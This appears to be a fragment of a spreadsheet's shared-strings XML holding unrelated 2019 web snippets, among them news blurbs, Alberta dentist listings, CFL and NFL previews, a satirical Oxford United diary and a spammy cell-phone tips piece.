localmart Buy or sell from your home. Looking for health-care providers in Canada? Use our Lumino Health Find a Health-care Provider tool to find top-rated dentists, optometrists, chiropractors and more near you. Ice Skating Near Me. Ice Skating is one of the best past times of the colder m...</t>
  </si>
  <si>
    <t>The Best 10 Dentists in Medicine Hat, AB Showing 1-10 of 23 Medicine Hat Health &amp; Medical Dentists. Dr Whitzke is the most knowledgable dentist in Medicine Hat! We had terrible experiences at other offices in the city. He is friendly and. 228. Solar for Diesel: The Sun Shines on Fort Chipewyan. Solar will replace 25 per cent of diesel generation in Fort Chipewyan a small community of 1,000 people in northern Alberta that until now has received all of its electricity from a diesel microgrid. Lead author Ashley Reynolds holds the Smilodon fatalis metacarpal from Medicine Hat, Alberta in this. the sabre-toothed. Most Popular Online Messaging Categories Whitening Endodontists Pediatric Rate these results View on the map Ad 1 Gaslight Dental Health Centre 304-578 3 St SE, Medicine Hat, AB T1A 0H3 Get directions. Cosmetic Dentist In Medicine Hat Alberta Top Dentist In Medicine Hat Alberta How precarious is the state of Alberta’s natural gas industry these days? Just take a look at the City of Medicine Hat, proudly known as the Gas City, which has owned its own petroleum. Contact the team at River Dental in Medicine Hat, Alberta is always here to help. U of T paleontologists find traces of sabre-toothed cat in Medicine Hat – This identification marks the northern-most record. fossils from Alberta labelled as Smilodon,” she says. “I knew then. Peace River, originally named Peace River Crossing, and known as Rivière-la-Paix in French, is a town in northwestern Alberta, Canada, situated along the banks of the Peace River, at its confluence with the Smoky River, the Heart River and Pat’s Creek. Understanding This Chart. To date, most deductions have been based on statements of actual extra-billing and user charges, meaning they are made two years after the extra-billing and user charges occurred (for example, deductions taken in fiscal year 2017-2018 would be in respect of patient charges levied in 2015-2016). MEDICINE HAT, ALTA.—Scientists have found fossil evidence from the last ice age of a sabre-toothed cat in southern Alberta —. 2 reviews of Southside Dental "Dr Whitzke is the most knowledgable dentist in Medicine Hat! We had terrible experiences at other offices in the city. He is friendly and treats his patients with respect. How wonderful. We are so happy our.</t>
  </si>
  <si>
    <t>Disgraced ex-NFL player Greg Hardy is no stranger to controversy and it has followed him to the UFC, with his use of an asthma puffer during a bout against Australian Ben 'Combat Wombat' Sosoli seeing him strip of a win.</t>
  </si>
  <si>
    <t>Nathan Hondros</t>
  </si>
  <si>
    <t>WA's Legislative Council is a strange beast and anyone who tells you they know who has the numbers in the debate on euthanasia is lying.</t>
  </si>
  <si>
    <t>Bon Marche-dagi "So punk" ko'rgazmasi munosabati bilan Guillaume Meurice do'kon uslubi direktori Jennifer Kuviller bilan suhbatlashdi. Moment Meurice – (1 […] The post "Bon Marché" da Punk ko'rgazmasi – Moment Meurice appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>Political parties that spread fake news online should be punished with bigger fines and restrictions on their use of data, according to a University of Oxford report. Read more? Click here</t>
  </si>
  <si>
    <t>Catarack21</t>
  </si>
  <si>
    <t>I have been using these sheets on my King bed for a number of years - very comfortable and well made in my experience, hold together well. I dont know anyone that has bought them new at 300$ a set tho. This is as cheap as I have seen them. usually 10ish dollars postage. I picked up two sets and that seemed to make postage free. If a new customer you can usually get a discount code also when you signup. Dont forget trying for cashback if your with cashrewards (8.4%) like I did.</t>
  </si>
  <si>
    <t>Via Fox News: President Trump announced Monday afternoon that he will soon issue an executive order imposing sanctions against Turkey for its “destabilizing” offensive in Syria, amid a bipartisan outcry over the president’s troop pullback earlier this year that endangered U.S.-aligned Kurdish forces. The sanctions followed the president’s Oct. 7 threat, when he warned that […]</t>
  </si>
  <si>
    <t>That’s how Sherman came to live with Chris, his wife Mika Cox McDougall, and their two daughters. The 200-pound donkey arrived there after having been kept in a small stall in a barn by a hoarder. Sherman was in such bad condition, his hooves overgrown to the point they curled up, that the McDougalls weren’t sure he’d live. Thanks to a hacksaw and a lot of patience and care, he did. Donkeys depend on the rocking motion of movement to digest their food, so McDougall got the wild idea of taking Sherman running. It’s not a new thing to run with a donkey — burro racing has been around since the 1940s. But would it be possible to run with Sherman, the donkey who almost didn’t live? With the help of a friend’s two donkeys, Flower and Matilda, it worked. “Here, she’s the easy one,” Mika McDougall told me when she handed me Matilda’s harness. Matilda did look friendly — she’s about Sherman’s size, at 200 pounds, a petite lady compared to Flower, who clocks in closer to 700 pounds and is taller than I am. But I also knew that Matilda had once kicked a dog so hard that its leg needed to be amputated. If I managed to get my leg broken by a donkey before the upcoming New York City Marathon, which I’ve been training for months now to run with my mother, she would murder me (and she’s resourceful enough to know how to make it look like an accident). Mika offered to take a picture, so I stood up straight, a step back from Matilda, with her leash in my hand. “No, get real close to her, and scratch her ears! She’s very friendly!” she said. Running with donkeys, it turns out, is not much different than running with my stubborn dog, only they’re a lot bigger and can break your leg. At multiple points along the way, Chris McDougall even called Flower “Dog.” He interviewed Cesar Millan — the Dog Whisperer — for his book, which he also wrote about in The Times this week. The three donkeys — Chris with Flower, me with Matilda, and Mika with Sherman — worked together like a pack. Flower led, Matilda followed, with Sherman bringing up the rear. Sherman never liked to let Matilda out of his sight, and when she sensed Sherman gaining on her, she sped up because she wanted to be in his lead. Source link</t>
  </si>
  <si>
    <t>Todd Cantwell (£5.0m) has come through injury doubts to start Norwich’s Gameweek 8 meeting with Aston Villa. The ...</t>
  </si>
  <si>
    <t>From www.farmerconnect.com Adding to the growing list of blockchain-based platforms focused on the coffee sector is Farmer Connect, a Swiss-born platform with initial participation from multiple multinational coffee trading organizations. Founded by Dave Behrends, the head of trading at the Geneva-based green coffee trading company Sucafina, the Farmer Connect platform officially launched last month with strategic backing or participation from major coffee-concerned organizations, including the Colombian Coffee Growers Federation (FNC), The J.M. Smucker Company, Jacobs Douwe Egberts (JDE), RGC Coffee, Itochu, Beyers Koffie and Sucafina. The blockchain-based tech being used was developed in part by IBM, based on the IBM Food Trust platform. In an announcement of the Farmer Connect launch, the startup noted the many steps and intermediaries involved between planting coffee trees to brewing the final cup, including harvesting, processing, packing, shipping, exporting/importing, blending, roasting and more. “These intermediaries all have their disparate ways of tracking information, which can make value and information exchanges across the supply chain more manual, more labor-intensive and less transparent than they could be,” the company said, adding, “Blockchain is ideally suited to help address these challenges because it establishes an immutable, transparent environment for transactions.” Daily Coffee News photo by Nick Brown. Like already established blockchain solutions for coffee and other commodities, the Farmer Connect platform promises to track coffee data at every transaction point, providing a fully traceable product that can ultimately benefit sellers catering to consumers who are interested in understanding the source of the goods they purchase. The company also pitches the platform as a potential benefit to farmers, too, as they can easily maintain the kinds of transaction data that could put them in a better negotiating position, particularly when seeking credit. “Global coffee prices recently hit the lowest price in over a decade, and many farmers are being forced to exit the industry entirely by turning to new crops or migrating,” Behrends said last month. “If this trend continues, it will severely impact the broader supply chain, and it will likely be consumers who ultimately shoulder the burden of higher retail prices or a reduced number of coffee producing countries.” The Farmer Connect platform was tested over the course of several months in with coffees originating from Colombia and Rwanda, the company said. A main element of the platform is an app called “Thank My Farmer,” which can be used by consumers to receive complete descriptions of the coffee they are drinking, while highlighting the coffee’s journey through an interactive map. The first version of the app will be available tested by consumers in “select markets” of J.M. Smucker and JDE, according to Farmer Connect, before the app is opened up for general release some time in 2020. “We believe that Farmer Connect will be the platform of choice for the coffee industry,” Rajendra Rao, general manager of IBM Food Trust, said in the announcement. “Through the innovative approach to supporting all stakeholders in the industry ecosystem, we know that both farmers and coffee lovers everywhere will benefit from transparent connectivity.” Related Reading Nick Brown Nick Brown is the editor of Daily Coffee News by Roast Magazine. Feedback and story ideas are welcome at publisher (at) dailycoffeenews.com, or see the “About Us” page for contact information. Tags: apps, Beyers Koffie, blockchain, Colombian Coffee Growers Federation, Dave Behrends, Farmer Connect, FNC, IBM, IBM Food Trust, Itochu, Rajendra Rao, RGC Coffee, Sucafina, Thank My Farmer, transparency</t>
  </si>
  <si>
    <t>The Myanmar government has introduced new regulations to facilitate easier access for tourists. Tourists from six countries – Australia, Germany, Italy, Russia, Spain and Switzerland – can now enter Myanmar with a visa-on-arrival at Yangon, Mandalay and Nay Pyi Taw airports. Myanmar offers visas-on-arrival to six new countries The post Myanmar offers visas-on-arrival to six new countries appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>TORONTO — Following a slew of divisive picks in Week 18, there’s just a single team that didn’t receive a unanimous vote to win in Week 19. The CFL.ca writers were all on the same page this week, as there wasn’t a single individual that picked against the Saskatchewan Roughriders, Hamilton Tiger-Cats, and Calgary Stampeders this week. However, there is one that does think that the Toronto Argonauts can pull off the upset in Montreal. That is Marshall Ferguson, who has gone against the grain to add some intrigue to the opening game of this week’s slate of games. Here are the picks for Week 19. Total CFL Pick ‘Em is back in 2019 with weekly and season-long prizes to those who can pick ’em best (View rules and regulations, including prizing). Odds provided by LeoVegas. RELATED » Weekly Predictor: Plenty of confidence in Week 19 » Total CFL Pick ‘Em: Make your picks for Week 19! » Be the GM in TSN CFL Fantasy presented by LeoVegas » The DailyRoto 2019 Fantasy Guide TOR at MTL This will be the second and final time the two East Division rivals will meet this season. The first time came at Touchdown Atlantic in Week 11, where the Als pulled out a 28-22 victory with a goal-line stop in the final seconds. Montreal head coach Khari Jones is planning to sit Montreal’s veterans down the stretch in an effort to keep them healthy for playoffs. Defensive lineman John Bowman is the most notable absentee from the Als’ lineup for Friday’s game. Vernon Adams Jr. will still play, as will his full complement of receivers. Additionally, William Stanback factors back in and will likely split touches with Jeremiah Johnson. Adams had a season-high four interceptions against the Bombers in Week 18, however, he still managed to toss for 266 yards and a pair of touchdowns in the loss. Quan Bray had 99 yards and a major while Eugene Lewis and Jake Wieneke each finished with over 50 yards — Wieneke also had a touchdown reception. The Argos got back into the win column against Ottawa in Week 18. McLeod Bethel-Thompson tossed for 300 yards and two touchdowns while completing 75 percent of his passes in the victory. It was a banner day for receiver S.J. Green, who hit two milestones while hauling in 10 catches for 170 yards. Both of McBeth’s scoring tosses landed in the hands of Armanti Edwards, who had 54 yards on the evening. The Argos’ defence also finished with four sacks and three interceptions on Will Arndt. Montreal already knows it will be hosting the Eastern Semi-Final, and with Hamilton having already locked up the East crown, it’s just about building momentum towards the postseason for the Als. PICK Writers: 83% MTL Fans: 96% MTL LeoVegas: MTL -10.5 SSK at BC Saskatchewan will travel to play a Lions squad that will miss the postseason, however, they’re not taking the matchup lightly. BC will be without Mike Reilly for the remainder of the season after he fractured his left wrist against Edmonton in Week 18. Danny O’Brien will make his first career start on Friday. After coming in to relieve Reilly against the Esks, he threw for 103 yards while completing just over half of his pass attempts. He’ll have nearly every weapon in the lineup. Running back John White and receivers Bryan Burnham, Duron Carter, Shaq Johnson, and Jevon Cottoy will all play. Saskatchewan will be trying to retake first in the West this week away from home. Cody Fajardo completed 62 percent of his throws in Week 18 for 209 yards and a touchdown. William Powell had 84 all-purpose yards with both a receiving and rushing touchdown while Naaman Roosevelt and Cory Watson each had 50-plus yard receiving games. With every game being crucial to deciding the West Division winner, BC could play spoiler on Friday. PICK Writers: 100% SSK Fans: 93% SSK LeoVegas: SSK -7 OTT at HAM To open the doubleheader on Saturday, we’ll get the team sitting atop the league standings going up against the team at the bottom. This will also be the final time these two teams match up in 2019. Hamilton took the first meeting by double digits. The Tabbies are coming into this game off their final bye week of the campaign. They took their last game in comfortable fashion, beating the Edmonton Eskimos by 30 points at home. Dane Evans completed 75 percent of his passes in that outing for 277 yards and a pair of touchdowns. Tyrell Sutton had 88 yards on 11 rushes, Brandon Banks caught eight passes for 81 yards, and Bralon Addison reeled in five catches of his own for 53 yards. The Ticats’ defence also had five sacks and three interceptions in the win. Will Arndt will get another shot under centre for the REDBLACKS on Saturday. Despite throwing three picks against the Argos, he still managed to air it out for 288 yards and two touchdowns. His two favourite targets were R.J. Harris and Dominique Rhymes, who finished with 96 and 70 yards, respectively, and a touchdown each. They didn’t go to the run often against Toronto, as the committee of Brendan Gillanders and Greg Morris filled in for the injured Mossis Madu. This one isn’t pegged to be very close by the books currently. Judging by just how dominant Hamilton has looked on both sides of the ball this season, Ottawa could be in for another long night. PICK Writers: 100% HAM Fans: 98% HAM LeoVegas: HAM -17.5 WPG at CGY The week closes with a massive clash with equally massive implications on the West standings. This will be the second of three games between the Bombers and Stamps. Winnipeg took the first meeting and could wrap up the season series on Saturday with a win. Bo Levi Mitchell has looked increasingly better with every game he gets under his belt since returning from injury. The Calagry pivot nearly completed 80 percent of his passes for 298 yards and two throwing majors against Saskatchewan in Week 18. He’s getting not only his top options involved but also some newer names, like Hergy Mayala and Josh Huff. Reggie Begelton led the way among receivers, catching all six of the balls thrown his way for 90 yards. However, it was Mayala’s 70-yard, two-touchdown outing that stole the headlines. Chris Streveler continues to be a threat on the ground and through the air. He had 174 passing yards and a touchdown while adding 64 yards rushing — it’s the fifth time this season he rushed for over 60 yards in a game. This could very well be a matchup in the playoffs, and with another head-to-head looming in Week 20, this game is undoubtedly the biggest game of the week. PICK Writers: 100% CGY Fans: 94% CGY LeoVegas: CGY -7</t>
  </si>
  <si>
    <t>Saturday 12 October 2019 It was another immaculate display on Saturday as Oxford romped their way to a 3-0 win over Doncaster. Afterwards KRob broke off a live radio interview to have a ruck with the Donny subs who were warming down on a part of the pitch they weren’t supposed to be on. ‘Sorry, things are so perfect, I’ve got nothing left to lose my shit about.’ said KRob panting with the satisfaction of a dog that had just had a swim in cow slurry. Sunday 13 October 2019 The sad news as Oxford United super-fan Andy ‘Womble’ James died on Sunday. At one point, Womble attended 1200 consecutive Oxford games over a period of 15 years. That includes every one of Les Robinson’s 458 games for the club, each of the 101 goals conceded by Richard Knight in 2000 and every lung busting run made by Dave Savage, which our statisticians calculate as being approximately none. Monday 14 October 2019 As GLS wakes on a Monday morning with the rain hammering down against his window he often questions the futility of life’s purpose, why nobody on Come Dine With Me serves baked beans on toast in front of the TV and who is East Yorkshire’s best player. Thankfully, a third of those questions have now been answered. East Yorkshire, if you’re not sure, is basically Hull with an en suite. Fourth in the list was jugged eared Oxford legend Dean Windass. Next, the futility of life’s purpose… Tuesday 15 October 2019 … or Hearts’ worst decisions, perhaps? Former Oxford manager Graham Rix was so dedicated to nurturing young talent they put him on a special register. Edinburgh Live have voted his appointment as the Jambos’ manager as their second worst decision ever. Apparently when the Hearts owner looked Rix in the eye, he saw a hero. Perhaps he should have looked longer, he may have seen that he was also a paedophile, racist and bully, as well as a terrible manager. Wednesday 16 October 2019 The club have announced that they plan to offer an option to fans for a refund to season ticket holders for the game that was cancelled due to Bury’s demise. It reminds GLS of the time Auntie Edna was caught routing around in dead Uncle Albert’s suit pockets looking for his wallet while he lay in his casket in the front room. Liverpool wunderkind Ben Woodburn has opened up about his career to the Daily Mail. ‘Turning twenty means he can no longer be called a teenager’ said the Mail in a rare moment of factual clarity. Thursday 18 October 2019 It was the Six Minute Eighteen Second Fans’ Forum on Thursday with Jose’s son John Mousinho. Like a slightly plump lady being asked when the baby is due; most of the questions focussed on the retirement he hasn’t announced and coaching he’s not doing. Au contraire; said Mr Mousinho, he is in the form of his Oxford United life; and what does he put this awakening to? ‘We’re playing so well, I don’t have to touch the ball as often’. Prize for the most conflated footballing analysis goes to Football Fan Cast who claim that ex-Oxford loanee Jordan Graham is so desperate to get his career back on track he’s gone to a racist country to do it. Graham is currently on loan in Bulgaria. Friday 19 October 2019 Oxford head for the Big Apple on Saturday to play at the ground so bad they named it once – The New York Stadium. Oh yes, we wanna wake up in the city that never sleeps… Rotherham.</t>
  </si>
  <si>
    <t>Jem Collins</t>
  </si>
  <si>
    <t>Tens of thousands of people marched to Westminster to demand a second referendum.</t>
  </si>
  <si>
    <t>Tinchlikda Sulli. Sizni shu tarzda yaratgan barcha odamlar uchun uzr. U yordam so'rab yig'layotganga o'xshaydi. Hayss. source Ex-f (x) Sulli […] The post Ex-f (x) Sulli (최 진리) Instagram Live yig'lash[180622] appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>Early October moves among PGA of British Columbia members include a departure from Ardmore Golf Course and a new executive professional at the Crown Isle Resort Community. Click here for more information.</t>
  </si>
  <si>
    <t>By MICHAEL SEPE The economic development plan to keep IGT and over 1,000 workers here in Rhode Island is vitally important to continuing the progress our state has made building a technology and innovation economy. I want to tell my community the story of how GTECH, and later IGT, helped fuel and build a foundation for my company and many others. The story of my family-owned small business and its incredible growth was directly tied to IGT’s rise. Twenty-nine years ago, I launched a small technology start up, Electro Networks, a division of Electro Standard Labs, with just two people. It began when GTECH gave us a chance to provide wiring services on a small project in one of their facilities. We hit the mark and hit the mark well. The one-time opportunity given to us by GTECH led to more projects with even greater responsibility and scope. We delivered high quality solutions to GTECH, which created excitement for future work. GTECH always came through for our company and our employees. Eventually, we wired six buildings throughout the state including the new world headquarters in Providence along with data centers across the country. Currently, we have 50 employees and IGT is a significant client. We continue to work for this Rhode Island economic powerhouse in other states and even in other countries. We have gained momentum because of our relationship with IGT which translates to our need to hire additional well paid staff like sales teams, project managers, material handlers and installation technicians. The bottom line is we grew as IGT grew. Every step of the way our IGT family gave my family business the opportunity to succeed. We’re proud to be a Rhode Island data and tech company. We continue to be the leader in the field and have expanded our R&amp;D and consulting focus on renewable energy and consult for the U.S. Navy, while building out a biotech practice right here in Western Cranston. This all was possible because of our work with IGT. A Rhode Island start up success story that paid it forward to my company. We know IGT generates approximately $330 million of economic activity in Rhode Island each year. Electro Standards is just one example of impact IGT has on job creation in Rhode Island. If IGT were to leave our state it would mean the loss of thousands of jobs from small businesses in nearly every community in our state. That’s why Governor Raimondo and legislative leaders have worked so hard to craft an economic development proposal that keeps the state’s largest technology company here, while providing millions in contracts for local small businesses. I look forward to fair and transparent hearings in the State House to prove this is in the best interest of the taxpayers. I will be there to tell my story when the hearings occur. The author is chief operations officer for Electro Standards Laboratories in Cranston.</t>
  </si>
  <si>
    <t>Frantsiya 3-shou uchun rasmiy kanal. Bu raketa fani, kashfiyot va fan jurnali emas. Garchi frantsuzlar dunyodagi eng yaxshi o'yinchilar bo'lishiga […] The post Bu raketa fani emas appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>crmodi1974</t>
  </si>
  <si>
    <t>****BARGAIN**** Super special on Stella Artois Fully Imported 500ML BIG cans case for $54.99. It's an absolute bargain. This is an instore promotion at Guildford West Bottlemart ONLY. Everyday low price on below products and can be MIX and MATCH. Jim Beam 700ML - 3 For $99.99 Johnnie Red 700ML - 3 For $99.99 Southern Comfort 700ML - 3 For $99.99 Address - 223A Fowler Road, Guildford West NSW 2161 Ph - 02 9632 6151</t>
  </si>
  <si>
    <t>Erica Alini</t>
  </si>
  <si>
    <t>From OAS to CPP to the age tax credit and making sure employers keep their pension promises: here's what the parties are pledging to do for seniors.</t>
  </si>
  <si>
    <t>Transport for Wales’ chief executive says he understands passengers’ frustration. Read more? Click here</t>
  </si>
  <si>
    <t>Mohamed Salah suffered no serious injury issues after limping off during Liverpool's win over Leicester and could still be in contention to face Man Utd</t>
  </si>
  <si>
    <t>Plans for a tax on workplace parking spaces are part of a transport bill expected to be passed at Holyrood. Read more? Click here</t>
  </si>
  <si>
    <t>All Members hired for the Oceanex Sanderling are to report for work for 8 a.m. Sunday October 06 2019. Thank you Have a safe shift!!</t>
  </si>
  <si>
    <t>If Australia wants to support peace and stability in the Middle East then it must do its bit to protect the Kurds in Syria.</t>
  </si>
  <si>
    <t>Who’s Playing Pittsburgh (home) vs. Baltimore (away) Current Records: Pittsburgh 1-3-0; Baltimore 2-2-0 What to Know Get ready for an AFC North battle as Baltimore and Pittsburgh will face off at 1 p.m. ET on Sunday at Heinz Field. The teams split their matchups last year, with Baltimore winning the first 26-14 on the road and Pittsburgh taking the second 23-16. The point spread favored Baltimore last week, but luck did not. They lost to Cleveland by a decisive 40-25 margin. The Ravens got a solid performance out of QB Lamar Jackson, who threw three TDs and picked up 66 yards on the ground on nine carries; unfortunately, it just wasn’t enough for the win. Jackson’s 50-yard touchdown toss down the left side of the field to WR Willie Snead in the fourth quarter made for one of the</t>
  </si>
  <si>
    <t>Nine has announced it has attained a 90 per cent stake in Macquarie Media, a milestone that will allow it to compulsorily buy out the remaining shares and bring the radio network under full ownership.</t>
  </si>
  <si>
    <t>After a definitive downward trend through the first half of 2019, vehicle sales appear to have reached a bottom in Canada, turning modestly higher in the third quarter, according to a report released on Wednesday by TD Economics. But the bank, in its Canadian Auto Outlook update, said year-to-date sales are still down 3.8 per cent through the first nine months, averaging 1.98 million units (seasonally adjusted annualized rate) and it expects sales to hover in the two million range through 2020. “From a regional standpoint, sales are down across all provinces, except for Prince Edward Island (+4.4 per cent year to date). Through the first eight months of 2019, the largest decline has been in Manitoba (-17.9 per cent year to date),” said the report. “Sales declines across Alberta (-5.5 per cent) and Saskatchewan (-2.2 per cent) have been more modest, not surprising given the sharp slowdown in sales across each of these provinces last year as both were still recovering from the 2015-16 oil price shock. “Across Ontario (-4.1 per cent year to date) and British Columbia (-6.4 per cent), the weakness in auto sales can be partially tied to last year’s slowdown in housing activity following the implementation of the B-20 (mortgage) stress test.” The report said Canadian production has also slowed through 2019, with year-to-date assemblies down approximately six per cent. “While some of the pullback can be attributed to the permanent wind down in production at GM’s Oshawa facility, a slower pace of assemblies across other automakers as a result of retooling is also to blame,” it said. “With the U.S. General Motors strike now in its fourth week, supply chain disruptions are already having an impact on Canadian operations. Production across Oshawa’s Line 1 and 2 has already come to a halt. Ingersoll is still running, though at limited capacity. With inventories starting to dwindle, production will be forced to stop over the coming weeks. The impact to overall Canadian output has, so far, been small. However, should the strike persist for the next few months, we estimate that it could reduce Canadian GDP by as much as 0.3 to 0.4 percentage points. With GM having already announced that it will pull forward the timing of when 2,100 Oshawa workers will be laid off, it is assumed that any production lost at this facility – roughly one-third of quarter four GM production – would not be recouped.” TD said the Canadian economy finally managed to snap out of a two-quarter slump with a rebound of nearly four per cent (annualized) in the second quarter. “However, much of the strength was due to one-time factors (i.e. an easing in oil curtailment, surge in aircraft exports), while final domestic demand has contracted in three of the past four quarters. We see little durability to the prior quarter’s performance. Growth for 2019 is forecast at 1.5 per cent, before rising to 1.6 per cent in 2020.” © Troy Media The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post Vehicle sales appear to have finally reached bottom appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
    <t>This warm salad is a superb dish for entertaining that hits just the right tone as we put winter behind us.</t>
  </si>
  <si>
    <t>Flower Mound, Texas News Pennsylvania teacher, 32, writes her own obituary after losing battle to recurrent laryngeal cancer Employee branded a ‘spoiled f***ing brat’ by Robert De Niro fires back at the Taxi Driver star Foreign Minister Marise Payne confirms Australians Jolie King and Mark Firkin freed from Iran jail Terrifying moment a prowler tries to get inside a home and then gets naked for a hot tub swim Sleepwalker, 21, ordered to give partners warning about his ‘sexsomnia’ Doctor busts the biggest myths surrounding gut health – and reveals how to improve digestive system New Zealand teacher married to former pupil despite resigning over ‘inappropriate’ relationship Pennsylvania teacher, 32, writes her own obituary after losing battle to recurrent laryngeal cancer Posted: 04 Oct 2019 11:36 PM PDT Ashley Ann Kuzma, 32, of Erie Pennsylvania, who died from laryngeal cancer last month, penned her own obituary to help ease the pain of her loss for her loved ones and to express her gratitude for her life. via https://youtu.be/mFQfuwZZ8h8 Employee branded a ‘spoiled f***ing brat’ by Robert De Niro fires back at the Taxi Driver star Posted: 04 Oct 2019 11:36 PM PDT Graham Chase Robinson – who is seeking $12 million in damages from De Niro – spoke through her attorney in an interview with Fox Business on Friday. via https://youtu.be/mFQfuwZZ8h8 Foreign Minister Marise Payne confirms Australians Jolie King and Mark Firkin freed from Iran jail Posted: 04 Oct 2019 10:26 PM PDT Perth couple Jolie King and Mark Firkin were arrested in Iran in July as they drove to London and were detained in Tehran’s Evin jail. Foreign Minister Marise Payne said they were now free. via https://youtu.be/mFQfuwZZ8h8 Terrifying moment a prowler tries to get inside a home and then gets naked for a hot tub swim Posted: 04 Oct 2019 10:26 PM PDT A prowler was caught on surveillance camera footage naked and dripping wet after he went skinny dipping in a backyard hot tub, as a mom and daughter were asleep inside the property. via https://youtu.be/mFQfuwZZ8h8 Sleepwalker, 21, ordered to give partners warning about his ‘sexsomnia’ Posted: 04 Oct 2019 10:26 PM PDT Dale Kelly (pictured(, of Dalton-le-Dale in County Durham, was asleep when he walked into the couple’s bedroom, climbed into their bed and started touching the woman intimately, a court heard. via https://youtu.be/mFQfuwZZ8h8 Doctor busts the biggest myths surrounding gut health – and reveals how to improve digestive system Posted: 04 Oct 2019 10:26 PM PDT A leading gut health expert has busted the biggest myths surrounding gut health – and revealed the three simple things everyone can do to improve their general digestive system. via https://youtu.be/mFQfuwZZ8h8 New Zealand teacher married to former pupil despite resigning over ‘inappropriate’ relationship Posted: 04 Oct 2019 10:16 PM PDT Natasha Miller was 23-years-old and had been teaching English at Tararua College in Pahiatua, New Zealand, in 2006, when she met Hayden MacDonald, 16. via https://youtu.be/mFQfuwZZ8h8 You are subscribed to email updates from News Digest. To stop receiving these emails, you may unsubscribe now. Email delivery powered by Google Google, 1600 Amphitheatre Parkway, Mountain View, CA 94043, United States</t>
  </si>
  <si>
    <t>A GOLD Coast cafe has become the first in the city to unveil their very own brand of instant coffee.</t>
  </si>
  <si>
    <t>France made heavy work of it at times but finished strongly to secure their second win of the Rugby World Cup with a bonus-point 33-9 victory over the United States on Wednesday.</t>
  </si>
  <si>
    <t>Sarah Carson</t>
  </si>
  <si>
    <t>Four lesbians give couples a relationship overhaul, opening up important conversations about romance, mental health and body image</t>
  </si>
  <si>
    <t>Are you interested in getting a new cell phone? Are you having trouble finding the one you want? Cell phones are complicated. This article is going to help you immensely. When you get to the bottom, you’ll really know cell phones! TIP! If you phone gets wet, it isn’t necessarily beyond repair. Take the battery out and place the cell phone in a plastic baggie filled with rice. Try not to watch too much video on your cell phone. Your phone plan may have a monthly data allowance. You may run through your limit and rack up sizable charges without even realizing it. Look for a new plan if you frequently go over. TIP! Don’t be in such a rush to get the latest phone. You may simply be wasting your money. Do not be so quick to purchase new phones as they are released. Sometimes it’s just not worth it. Though new phones are always coming out, the differences are often minute when compared to the upgrade in price. Before buying a new phone, read the reviews for it to ensure it is truly necessary for you to make the upgrade. There are many cases when this is not necessary. TIP! If you have a smartphone, you no doubt use it all day long. However, you should be sure you shut it off from time to time. Remember that smartphones slow down as they age. Updating your phone on a regular basis can keep it from becoming obsolete. However, over time your phone will not have the memory required for new updates. In short time, new updates can overwhelm an older phone. TIP! Take care when it comes to purchasing extended warranties. Often the charges for these are large and the warranties are rarely needed. If you have a smartphone, you most likely use it quite often throughout the day. Turn it off from time to time when you can. Smartphones and computers are very similar. Restarting them helps keep memory free and the device running at its best. You should notice a significant difference in the way your smartphone functions just by turning it off a few times a week. TIP! It’s a good idea to visit actual stores and compare cell phones side by side in person. Give yourself a few hours testing different models and features. Cell Phone TIP! Make sure your phone stays out of water. Many people have ruined their phone by dropping it in water. The article you read covers the basics of cell phone technology. Take notes about the things you have learned. Now, you have the power and knowledge to find and use your cell phone with some confidence and ease! Ask questions, too, and do additional research if needed. Bookmark the page and use it as you need it. TIP! Even if you have generally stayed with the same manufacturer of phones, never hesitate to look around to others. You might be used to a certain kind, but you should expand your horizons. Your knowledge of compare voip rates to india has probably been expanded as a result of reading this article. Start immediately, as you should not waste any time. Continue to learn, but keep this information around to be sure you do well. You will soon see results.</t>
  </si>
  <si>
    <t>John Martin</t>
  </si>
  <si>
    <t>At the time it was the biggest ever spend in a transfer window by Newcastle United, over £50m spent in summer 2015. After a serious lack of investment in the...At the time it was the biggest ever spend in a transfer window by Newcastle United, over £50m spent in summer 2015. After a serious lack of investment in the... You can click here to read the full article. The post Top scorer in English football this season – A mistake by Newcastle United to let him go? appeared first on NUFC The Mag.</t>
  </si>
  <si>
    <t>A new Star Trek: Picard trailer debuted at during the New York Comic Con panel at Madison Square Garden. In attendance were cast members Sir Patrick Stewart (Jean-Luc Picard), Isa Briones (Dahj), Santiago Cabrera (Cristobal “Chris” Rios), Michelle Hurd (Raffi Musiker), Alison Pill (Dr. Agnes Jurati), Harry Treadaway (Narek) and Evan Evagora (Elnor), alongside executive producers Alex Kurtzman, Michael Chabon, Akiva Goldsman and Heather Kadin as well as co-executive producer and director Hanelle Culpepper and supervising producer Kirsten Beyer. In addition, it was announced it will premiere on Amazon Prime Video on Friday, 24 January 2020. Following the premiere, new episodes of 10 part series will be available weekly on Fridays.</t>
  </si>
  <si>
    <t>YOUR daily horoscope for this Sunday sees both a Sextile and a Semi-Sextile arrive in the skies – how will these affect your astrology horoscope today? Daily Express :: Life and Style Feed</t>
  </si>
  <si>
    <t>THE rate of acute rheumatic fever diagnoses in the NT more than doubled during the four years to 2017, new research has revealed.</t>
  </si>
  <si>
    <t>WARNING: GRAPHIC VIDEO BELOW</t>
  </si>
  <si>
    <t>Whitesnake – Here I Go Again, Download Festival 2019. Donington Park, 14.06.2019 The post Whitesnake – Here I Go Again, Download Festival 2019. appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>At 16, MiMi Aung travelled alone to the US for an education. Now she’s a project lead on Nasa’s Mars mission. The post Nasa Mars 2020 Mission’s MiMi Aung on women in space appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>The Chikuma River burst its banks and flooded a wide area in Japan’s Nagano prefecture after Typhoon Hagibis brought heavy rain to the country over the weekend of October 12. NHK reported that rescue operations were being conducted by Self Defense Force helicopters, and that floodwater broke a levee in a 70-meter stretch in the Hoyasu district of Nagano city. Video here of an aerial survey conducted by the Japanese Ground Self Defense Force Eastern Division shows the extent of the flooding in the area surrounding the river. At least 66 people were killed when Typhoon Hagibis swept over Japan, national media reported, with more than a dozen others still missing on October 14 as search and rescue efforts continued. Credit: JGSDF Eastern Division via Storyful</t>
  </si>
  <si>
    <t>The J man</t>
  </si>
  <si>
